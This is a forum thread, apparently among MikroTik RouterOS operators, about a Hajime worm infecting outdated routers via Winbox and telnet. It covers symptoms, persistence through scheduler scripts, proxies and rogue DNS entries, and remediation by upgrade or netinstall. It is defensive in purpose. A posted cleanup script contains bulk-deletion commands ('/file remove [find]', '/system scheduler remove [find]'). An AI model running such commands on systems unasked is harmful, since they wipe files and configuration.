@macgaiver
Isn't your proposal going hand-in-hand with the new sex trafficking law ? https://www.wired.com/story/how-a-contr ... e-the-web/

I'm on the other side of the World, in here torrents and other file sharing is still at large, so some if not most responsibility is taken by customer when he signs the agreement.

I noticed a log entry on SXT5Lite (RouterOS v 6.34.2, 6.34.4, 6.37.1) and then router starts syn sent flood dstport 23 and 8291...... connections count about 900-2000...

Upgrade to ver 6.39.1 fix this... Bad new's - most of our clients have version between 6.34.2 and 6.37.1

Definitely try to upgrade, otherwise this thing can spread and make your problems even worse.

@normis
I've just discovered two devices, one is RB SXT 5HnD with ROS 6.41.3, upgraded from older version after infection. Both continue to scan for telnet, upgrading didn't solve problem. Just generating suppout, await for it on support.

blazej44800 - We received such e-mail (I assume that it was you) and upgrade had already resolved the problem. However, also local RouterOS devices running old software were already infected. After an upgrade on those devices problem must be resolved right away.

You can check this by running Tool/Torch on your device - here you can clearly see that traffic comes from local IP addresses and then check if this source IP is a router running an old RouterOS version.

At the moment we are not aware about any single case when upgrade would not resolve the issue.

So far my testing show that only mipsbe devices are getting exploited. Anyone notice other architectures affected?

Also all of the devices actually required reboot to get the exploit part going, from what i read here i had idea that everything will happen straight away...

So far my testing show that only mipsbe devices are getting exploited. Anyone notice other architectures affected?

I haven't, though fully-fleshed example exploits of this vulnerability were released for both mipsbe and x86 earlier this month, and Hajime supports mipsbe, x86, and arm, so it is at least *likely* that an x86 version exists but that there simply aren't enough x86 ROS boxes out there for it to spread at the same rate. If the author simply lifted the exploits from the examples that were released, then that means it's unlikely that arm, powerpc, or tile are being infected, both because it would require some additional/original work on the author's part for arm support and also because AFAIK Hajime doesn't even have binaries for powerpc or tile at this time.

Also all of the devices actually required reboot to get the exploit part going, from what i read here i had idea that everything will happen straight away...

I'm not sure if it executes straight away or only does so after a reboot. As I implied in a prior post, I have been able, as a test, to copy the Hajime loader onto a clean device and run it manually, and it will start up and run; however it will not install the rc.d (startup) script itself, so whatever host is pushing the Hajime loader onto the device is also pushing the rc.d script onto it. If you only put the actual Hajime binary onto a device and run it, it will not automatically start up after reboot.

It's possible that the host pushing the infection is 1) copying Hajime binary to device, 2) copying Hajime rc.d script to device, and then 3) issuing reboot command to device, starting it that way. There is no reason why it would have to issue reboot, though, instead of just start up the Hajime process straight away.

-- Nathan

I use a non-standard port for all the ways into the router (including WinBox) - in addition to other things for security. I have a firewall rule that drops traffic bound for the standard ports for www, ftp, ssh, & WinBox. The real purpose of those rules is to give me packet counts since they would be dropped later anyway. Sure enough, I have been getting quite a few hits on the "normal" WinBox port 8591...
Made sure all three routers were up to date too (they were all pretty close)...

We have the same problem, i noticed the problem is in versions before 6.37, i was able to resolve this problem upgrading the RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything just upgrade to the last version and the problem is fixe. There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem

There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem

It is actually YOU who doesn't know you had to update...
When you had been on the mailing list or forum, you would have known about this for months.
It is better to keep your devices uptodate so you are less likely to be affected by problems like this.
And of course configure your firewall correctly so the admin interface is not available from the internet.

We have the same problem, i noticed the problem is in versions before 6.37, i was able to resolve this problem upgrading the RouterOS to 6.42.1 and upgrading the firmware. No need to fresh install anything just upgrade to the last version and the problem is fixe. There's a worm infecting RouterOS and i guess Mikrotik doesn't know or just ignore the problem

What?
First of all, depending upon the state and depth of the compromise a wipe and fresh install may be required. In other words one cannot generalize your fix as a panacea for eveyone elses issues.
The vulnerability of the Mikrotik Router in past OS's and via Winbox have been well documented and patched by Mikrotik so I would say you are ill informed regarding their work. Logically speaking why would they ignore the problem as it makes no sense from a technical, security or business perspective. As an purported engineer in your signa, do you really think the engineers at Mikrotik would have such an approach?? From my reading most of the issues were NOT actually POSSIBLE unless the person administering the router was incompetent (at least from a security point of view).

Just check in System -> Schedule.
There will be a schedule to run a script every minute that continues to allow the hackers in.
Remove the script from System -> scripts too.
SOCKS proxy has probably been enabled. turn that off.
check there are no new users added under System -> users
change the password of the existing user.
kill the existing connections from the IP -> firewall -> connections table.
Also check for NAT rules.

obviously if possible restrict Winbox access too.

oh, and yeah, upgrade routerOS to a version that doesn't allow the whole internet to pull down the username & password table

Another important check is:

check if you have static entrien on IP/DNS/Static

i found DNS A Record and CNAME to fake mikrotik download site

maybe for download an altered version of routeros

Another important check is:

check if you have static entrien on IP/DNS/Static

i found DNS A Record and CNAME to fake mikrotik download site

maybe for download an altered version of routeros

That's a really interesting one. I hadn't thought to check that!

Just check in System -> Schedule.
There will be a schedule to run a script every minute that continues to allow the hackers in.
Remove the script from System -> scripts too.
SOCKS proxy has probably been enabled. turn that off.
check there are no new users added under System -> users
change the password of the existing user.
kill the existing connections from the IP -> firewall -> connections table.
Also check for NAT rules.

obviously if possible restrict Winbox access too.

oh, and yeah, upgrade routerOS to a version that doesn't allow the whole internet to pull down the username & password table

Wrong wrong wrong. You cannot remove this sheite by simple means.
Stop, dont check anything, dont waste your time...........
The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.

I suggest you to use net install for new start.Then update your version.

Wrong wrong wrong. You cannot remove this sheite by simple means.
Stop, dont check anything, dont waste your time...........
The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.

Agree with this. I had the same issue some time back because my external Winbox access (for trusted networks) had been incorrectly configured and Winbox was in fact exposed to the entire internet. Ouch.

You can strip everything from the config, but it will be back after a reboot. Trust me, I tried as a short term fix until I was able to do more. I went one step further and bought a new RouterBOARD (took the opportunity to upgrade from RB750 to RB750Gr3/hex. I've since run netinstall on the affected box to the latest software version to use an internal testing box - no sign of the previous issues after netinstall.

I'm also now using a RSS to email application to keep updated with the changelogs.

to supplement as i had similar issue.

best is to run as stated netinstal but do not restore the config. My problem with this was that there was a script setup in scheduler that i have not noticed and it was in the config. Resoring mikrotik from netinstall didn't help as i restored problem from the backup :) In my case there was a script that every 2hrs was pulling something from internet and making config then it was keep adding proxy IP addresses that threat actors wanted to use for their botnet. Fortunately i have avoided damage due to well configured firewall, but had to re-do a lot of stuff.

to supplement as i had similar issue.

best is to run as stated netinstal but do not restore the config.

Actually, nobody above told you to restore the config! They all mention "start from scratch" after netinstall. Restoring the config is not safe, and when you did that you need to repeat the netinstall.
The only thing you can do to restore some settings is to reset the router to empty config and then use a /export file opened in a separate window to copy/paste settings that you KNOW are safe.
(so in that phase you skip the scripts and other settings that you did not make yourself. best is to use the copy/paste only for items that are difficult to exactly replicate via manual setup)

Better if you make an export and share here

do: and after open it with notepad,
and after censore your identifiable data with *** (not remove anything, just censore),
share the export.rsc

Same issue here, kindly check the both current export and hacked rsc files

Your fault, keep using 6.40 some years old (2018-02-26) without any trace of firewall with winbox on standard 8291 port open to all the world...
Use netinstall to remove all the mess...

On meantime paste this on terminal:

Thanks for the info. May you please also post the command to remove the 7wmp0b4s.rsc file from the File List.

You seriously ask this?
Click on red "-"???

Or on terminal
Remember to netinstall and CHANGE PASSWORD NOW

On System / User check if other users are present.

Just upgraded an client CPE to ROS 6.48.1, issue still persist. Seriously need to perform netinstall on all client devices and these are 200 units. Any suggestions to save time.
Performed a script on all devices

/file remove [find]
/
/ip socks set enabled=no
/
/system scheduler remove [find]
/
/interface l2tp-client remove [find]
/
/tool mac-server set allowed-interface-list=none

Sorry if I'm rude,
but the time you didn't invest in safety,
now you spend thousand times as much to repair the damage.

CHECK ON USERS IF MORE THAN ONE "ADMIN" USER EXIST
CHANGE PASSWORDS (and do not use again the same password for all the devices)